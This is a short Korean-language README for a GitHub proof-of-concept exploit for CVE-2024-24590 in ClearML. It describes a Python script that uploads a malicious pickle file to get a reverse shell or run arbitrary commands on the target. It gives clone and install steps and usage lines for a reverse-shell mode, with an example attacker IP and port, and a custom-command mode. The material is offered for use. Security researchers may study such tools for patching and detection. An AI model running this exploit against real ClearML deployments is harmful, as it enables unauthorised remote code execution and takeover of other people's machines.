
CVE-2024-24590 ClearML RCE&CMD POC
이 저장소에는 CVE-2024-24590에 대한 Python 익스플로잇 스크립트가 포함되어 있습니다. 이 스크립트는 악성 pickle 파일을 ClearML에 업로드하여 대상 머신에서 리버스 셸 또는 사용자 지정 명령을 실행하도록 설계되었습니다.
저장소를 클론합니다:
git clone https://github.com/diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC.git
cd CVE-2024-24590-ClearML-RCE-CMD-POC
ClearML SDK를 설치합니다:
pip install clearml
clearml-init
이 스크립트는 default 및 cmd 두 가지 작동 모드를 지원합니다.
이 모드에서는 리버스 셸을 설정하기 위해 공격자의 IP와 포트를 제공해야 합니다.
python3 exploit.py default <project_name> <task_name> <attacker_ip> <attacker_port>
이 모드에서는 실행할 사용자 지정 명령을 제공할 수 있습니다.
python3 exploit.py cmd <project_name> <task_name> --cmd "<your_command>"
python3 exploit.py default "Black Swan" "pwned4" "10.10.14.10" "1234"
python3 exploit.py cmd "Black Swan" "pwned4" --cmd "touch /tmp/shell.sh"